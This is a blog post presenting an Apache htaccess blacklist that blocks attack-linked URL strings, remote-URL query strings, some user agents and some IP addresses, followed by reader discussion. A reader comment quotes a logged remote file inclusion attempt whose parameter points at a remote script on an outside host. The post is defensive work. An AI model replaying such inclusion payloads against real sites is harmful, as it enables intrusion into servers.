
Perishable Press 3G Blacklist

After much research and discussion, I have developed a concise, lightweight security strategy for Apache-powered websites. Prior to the development of this strategy, I relied on several extensive blacklists to protect my sites against malicious user agents and IP addresses.

Over time, these mega-lists became unmanageable and ineffective. As increasing numbers of attacks hit my server, I began developing new techniques for defending against external threats. This work soon culminated in the release of a “next-generation” blacklist that works by targeting common elements of decentralized server attacks.

Consisting of a mere 37 lines, this “2G” Blacklist provided enough protection to enable me to completely eliminate over 350 blacklisting directives from my site’s root htaccess file. This improvement increased site performance and decreased attack rates; however, many bad hits were still getting through. More work was needed.

The 3G Blacklist

Work on the 3G Blacklist required several weeks of research, testing, and analysis. During the development process, five major improvements were discovered, documented, and implemented. Using pattern recognition, access immunization, and multiple layers of protection, the 3G Blacklist serves as an extremely effective security strategy for preventing the vast majority of common exploits. The list consists of four distinct parts, providing multiple layers of protection while synergizing into a comprehensive defense mechanism. Further, as discussed in previous articles, the 3G Blacklist is designed to be as lightweight and flexible as possible, thereby facilitating periodic cultivation and maintenance. Sound good? Here it is:

# PERISHABLE PRESS 3G BLACKLIST

# PART I: CHARACTER STRINGS
<IfModule mod_alias.c>
 RedirectMatch 403 \:
 RedirectMatch 403 \;
 RedirectMatch 403 \<
 RedirectMatch 403 \>
 RedirectMatch 403 \/\,
 RedirectMatch 403 \/\/
 RedirectMatch 403 f\-\.
 RedirectMatch 403 \.\.\.
 RedirectMatch 403 \.inc
 RedirectMatch 403 alt\=
 RedirectMatch 403 ftp\:
 RedirectMatch 403 ttp\:
 RedirectMatch 403 \.\$url
 RedirectMatch 403 \/\$url
 RedirectMatch 403 \/\$link
 RedirectMatch 403 news\.php
 RedirectMatch 403 menu\.php
 RedirectMatch 403 main\.php
 RedirectMatch 403 home\.php
 RedirectMatch 403 view\.php
 RedirectMatch 403 about\.php
 RedirectMatch 403 blank\.php
 RedirectMatch 403 block\.php
 RedirectMatch 403 order\.php
 RedirectMatch 403 search\.php
 RedirectMatch 403 errors\.php
 RedirectMatch 403 button\.php
 RedirectMatch 403 middle\.php
 RedirectMatch 403 threads\.php
 RedirectMatch 403 contact\.php
 RedirectMatch 403 include\.php
 RedirectMatch 403 display\.php
 RedirectMatch 403 register\.php
 RedirectMatch 403 authorize\.php
 RedirectMatch 403 \/wp\-signup\.php
 RedirectMatch 403 \/classes\/
 RedirectMatch 403 \/includes\/
 RedirectMatch 403 \/path\_to\_script\/
 RedirectMatch 403 ImpEvData\.
 RedirectMatch 403 head\_auth\.
 RedirectMatch 403 db\_connect\.
 RedirectMatch 403 check\_proxy\.
 RedirectMatch 403 doeditconfig\.
 RedirectMatch 403 submit\_links\.
 RedirectMatch 403 change\_action\.
 RedirectMatch 403 send\_reminders\.
 RedirectMatch 403 comment\-template\.
 RedirectMatch 403 syntax\_highlight\.
 RedirectMatch 403 admin\_db\_utilities\.
 RedirectMatch 403 admin\.webring\.docs\.
 RedirectMatch 403 function\.main
 RedirectMatch 403 function\.mkdir
 RedirectMatch 403 function\.opendir
 RedirectMatch 403 function\.require
 RedirectMatch 403 function\.array\-rand
 RedirectMatch 403 ref\.outcontrol
</IfModule>

# PART II: QUERY STRINGS
<IfModule mod_rewrite.c>
 RewriteEngine On
 RewriteCond %{QUERY_STRING} ftp\:   [NC,OR]
 RewriteCond %{QUERY_STRING} http\:  [NC,OR]
 RewriteCond %{QUERY_STRING} https\: [NC,OR]
 RewriteCond %{QUERY_STRING} \[      [NC,OR]
 RewriteCond %{QUERY_STRING} \]      [NC]
 RewriteRule .* -                    [F,L]
</IfModule>

# PART III: USER AGENTS
SetEnvIfNoCase User-Agent "Jakarta Commons" keep_out
SetEnvIfNoCase User-Agent "Y!OASIS/TEST"    keep_out
SetEnvIfNoCase User-Agent "libwww-perl"     keep_out
SetEnvIfNoCase User-Agent "MOT-MPx220"      keep_out
SetEnvIfNoCase User-Agent "MJ12bot"         keep_out
SetEnvIfNoCase User-Agent "Nutch"           keep_out
SetEnvIfNoCase User-Agent "cr4nk"           keep_out
<Limit GET POST PUT>
 order allow,deny
 allow from all
 deny from env=keep_out
</Limit>

# PART IV: IP ADDRESSES
<Limit GET POST PUT>
 order allow,deny
 allow from all
 # blacklist candidate 2008-01-02 = admin-ajax.php attack
 deny from 75.126.85.215
 # blacklist candidate 2008-02-10 = cryptic character strings
 deny from 128.111.48.138
 # blacklist candidate 2008-03-09 = block administrative attacks
 deny from 87.248.163.54
 # blacklist candidate 2008-04-27 = block clam store loser
 deny from 84.122.143.99
</Limit>

Installation and Usage

Before using the 3G Blacklist, check the following system requirements:

  • Linux server running Apache
  • Enabled Apache module: mod_alias
  • Enabled Apache module: mod_rewrite
  • Ability to edit your site’s root htaccess file (or)
  • Ability to modify Apache’s server configuration file

With these requirements met, copy and paste the entire 3G Blacklist into either the root htaccess file or the server configuration file. After uploading, visit your site and check proper loading of as many different types of pages as possible. For example, if you are running a blogging platform (such as WordPress), test different page views (single, archive, category, home, etc.), log into and surf the admin pages (plugins, themes, options, posts, etc.), and also check peripheral elements such as individual images, available downloads, and alternate protocols (FTP, HTTPS, etc.).
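
By way of illustration, here is one way the root htaccess file of a typical WordPress site might be organized once the blacklist is in place. This is only a minimal sketch, assuming default WordPress permalinks: the blacklist is abbreviated, and the WordPress section is the standard rewrite block generated by the permalink settings (your own file may differ):

# PERISHABLE PRESS 3G BLACKLIST
# (paste Parts I through IV from above, in full)

# BEGIN WordPress
<IfModule mod_rewrite.c>
 RewriteEngine On
 RewriteBase /
 RewriteCond %{REQUEST_FILENAME} !-f
 RewriteCond %{REQUEST_FILENAME} !-d
 RewriteRule . /index.php [L]
</IfModule>
# END WordPress

Keeping the blacklist at the top of the file keeps all of the security directives together and easy to locate during maintenance.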

While the 3G Blacklist is designed to target only the bad guys, the regular expressions used in the list may interfere with legitimate URL access. If this happens, the browsing device will display a 403 Forbidden error. Don’t panic! Simply check the blocked URL, locate the matching blacklist string, and disable the directive by placing a pound sign ( # ) at the beginning of the associated line. Once the correct line is commented out, the blocked URL should load normally. Also, if you do happen to experience any conflicts involving the 3G Blacklist, please leave a comment or contact me directly. Thank you :)
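
To illustrate, suppose a legitimate URL on your site happens to contain the string “search.php” and returns a 403 (a purely hypothetical example). Commenting out the matching directive in Part I would look like this:

 RedirectMatch 403 order\.php
 # disabled to restore access to a legitimate URL:
 # RedirectMatch 403 search\.php
 RedirectMatch 403 errors\.php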

Wrap Up

As my readers know, I am serious about site security. Nothing gets my adrenaline pumping more than the thought of a giant meat grinder squirting out endless chunks of mangled cracker meat. Spam and other exploitative activity on the web has grown exponentially. Targeting and blocking individual user agents and IP addresses is no longer a viable strategy. By recognizing and immunizing against the broadest array of common attack elements, the 3G Blacklist maximizes resources while providing solid defense against malicious attacks.

Updates

Updates to the 3G Blacklist/firewall:

2008/05/14

Removed “RedirectMatch 403 \/scripts\/” from the first part of the blacklist due to conflict with Mint Statistics.

2008/05/18

Removed the following three directives to facilitate Joomla functionality:

RedirectMatch 403 \/modules\/
RedirectMatch 403 \/components\/
RedirectMatch 403 \/administrator\/

2008/05/31

Removed “RedirectMatch 403 config\.php” from the first part of the list to ensure proper functionality with the “visual-editing” feature of the WordPress Admin Area.

About the Author
Jeff Starr = Fullstack Developer. Book Author. Teacher. Human Being.

84 responses to “Perishable Press 3G Blacklist”

  1. Hehe, I make a really bad reader… I can’t even cheerlead :p

    By the way, thank you for the link, it was an interesting read. I edited my .htaccess and it’s working fine for me too.

    As I had my nose in Apache code, I changed the way I handle gzip content on my server. I used to have a somewhat tricky strategy involving three .htaccess files and the like; now I centralize everything in the root .htaccess, as it should be, and I find the code to be way better.

    Here it is:

    # SEND GZIPPED CONTENT TO COMPATIBLE BROWSERS
    RewriteEngine On
    AddEncoding x-gzip .gz
    AddType "text/css;charset=utf-8" .css
    AddType "text/javascript;charset=utf-8" .js
    # serve the precompressed .gz file when the browser accepts gzip
    RewriteCond %{HTTP:Accept-encoding} gzip
    #RewriteCond %{HTTP_USER_AGENT} !Safari
    RewriteCond %{REQUEST_FILENAME}.gz -f
    RewriteRule ^(.*)$ $1.gz [QSA,L]

  2. Perishable 2008/06/14 8:35 am

    Glad to hear that the Blacklist is once again working fine for you. That particular rule blocks many ill requests. It is good to have it!

    Interesting that you mention centralizing htaccess rules. I have been working on the very same thing. I am in the process of consolidating everything in the public web root, such that individual domains will require much less fiddling. Definitely way better ;)

    Thanks also for the sweet htaccess code — looks juicy! I have seen similar directives floating around the Web, but have yet to experiment with them. As you may know, my host (ASO) recently disabled gzip compression on all servers. I am still able to deliver compressed (X)HTML content, but CSS and JavaScript are currently sent uncompressed.

  3. (a) Yes, it’s my favorite rule indeed, if you remember :p

    (b) Managing Apache behavior should always be done in one configuration file (aka .htaccess) only. As you say, it’s way easier.

    (c) It is juicy, believe me. I’m using it on my main website for the moment, and boy I wish I had known it before!

    It filters browsers and serves compatible ones the .gz version of static files, all over your website. That means, for example, that you can gzip the WordPress admin JS & CSS files and enjoy a tremendous boost in admin page loading times!

    With files like prototype.js or jquery.js being used by WordPress and weighing around 100 KB, being served a 70% lighter .gz alternative is really cool.

  4. That’s the whole idea. It only applies to files you know won’t change. You compress them manually once, then serve these .gz files to the visitors.

    On-the-fly compression has its great advantages, but for static content, it’s a waste of CPU.

    I wrote a full post on this on my blog, but I fear Google’s translation won’t be as appealing as my natural writing style.

    Once again, language is a true barrier :/

  5. Definitely sweet, but does that mean you are responsible for manually creating and maintaining the individual zip files?

  6. Is the 3G Blacklist supposed to replace the 2G Blacklist or can you put them both together?

  7. Perishable 2008/07/26 4:03 pm

    Hi Tom, the 3G Blacklist is meant to replace the 2G in its entirety. Running both together would be overkill.

  8. Very nice work!! I put this script in place and have noticed a significant reduction in the log files.
    How would you modify this script to deny all user agents (while keeping in place an allow-all for IPs with denials on specific IPs)? In other words, I would like to allow all IPs (with specific IP denials) and disallow all user agents. I’ve got a pesky problem with user agents (legit names) trying to access an exploit which no longer exists on our site. See below:

    f2.d.5446.static.theplanet.com - - [06/Aug/2008:01:00:51 +0000] "GET
    /portal/components/com_extcalendar/extcalendar.php?
    mosConfig_absolute_path=http://www.shakershoppe.com/_files/x.txt??M
    HTTP/1.1" 403 259

    3G is doing a nice job of issuing 403s but I’m ready to turn off all user agents.

    Keep up the GREAT WORK!!!

  9. Hi James, glad to hear the blacklist is working for you :) As far as disallowing all user agents while allowing specific IPs, either I am not understanding you correctly or I am confused as to how that might work. It seems that blocking all user agents would essentially block all traffic/visitors, correct? Otherwise, the rules used to block all user agents would conflict with any list of allowed IP addresses. What am I missing here?
    Regards,
    Jeff

  10. Jeff, thanks very much for the quick reply, and sorry about the confusion. After spending some time on the Apache site, I came to the conclusion that blocking user agents (via deny) would also impact the default deny for IPs. In other words, Apache seems to allow only one default policy for the typical allow-then-deny setup.

    In essence, blocking all user agents would block all traffic/visitors. What I would like is to deny all bots/crawlers but allow regular users. Is there a way to do this (instead of specifying user agents to keep out, as in your PART III: USER AGENTS)?

    Thanks,
    James

  11. Jeff Starr 2008/08/06 5:34 pm

    Hi James, in my experience, blocking specific user agents is a moderately futile endeavor. The reason for this is that user agents are constantly changing and easily faked. Keeping an effective blacklist of user agents requires a fair amount of diligence, researching new agents, new fakes, and then checking and updating the blacklist and so on. This is precisely one of the reasons why I developed the 3G blacklist. The 3G takes a different approach by blocking the various character strings used in attacks, thereby eliminating the need for regular maintenance and, ultimately, monstrous lists of banned agents. Nonetheless, I have compiled an excellent blacklist of undesirable user agents, bad bots, scrapers, and other scumbags. It is extensive in its scope, yet not so exhaustive as to negatively affect server performance. The compressed version of the list is available here.
    Regards,
    Jeff

  12. Hey Jeff,

    I fired the 3G blacklist into the .htaccess file in my server’s root and things have gone haywire!

    I’ve replaced it with the original file but I’m still getting sitewide Internal Server Errors.

    If you have any ideas on what I might’ve done, I’d truly appreciate hearing them,

    Cheers,

Comments are closed for this post. Something to add? Let me know.